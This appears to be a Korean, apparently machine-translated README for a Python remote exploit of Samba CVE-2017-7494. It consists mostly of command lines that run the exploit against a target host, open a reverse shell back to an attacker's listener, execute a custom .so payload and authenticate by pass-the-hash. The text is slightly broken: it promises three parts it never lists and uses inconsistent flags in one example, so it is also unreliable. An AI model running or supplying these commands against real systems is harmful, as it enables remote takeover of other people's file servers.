
CVE-2017-7494 python 익스플로잇
SAMBA CVE-2017-7494 취약점 (일명 is_know_pipename)에 대한 원격 익스플로잇입니다!
이 익스플로잇은 3부분으로 나뉩니다:
대상이 취약하고 페이로드가 대상 운영 체제 및 아키텍처에 적합하다면 익스플로잇은 상당히 신뢰할 수 있습니다.
대상에 대해 익스플로잇을 실행하고 셀이 나타날 때까지 기다리십시오:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
samba 버전 3.5.0 > 3.6.0의 경우 -o 1 인수를 추가하기만 하면 됩니다.
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
사용자 정의 .so 파일을 실행합니다.
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
사용자 정의 samba 포트를 사용하려면 -p 인수를 사용하십시오.
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
smbpasswd 해시를 만나서 크랙할 수 없는 경우 --hashes=LM:NT 인수를 사용하여 pass-the-hash를 할 수 있습니다.
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
이 저장소는 joxeankoret/exploit-CVE-2017-7494 및 Archivaldo 저장소에서 영감을 받았습니다.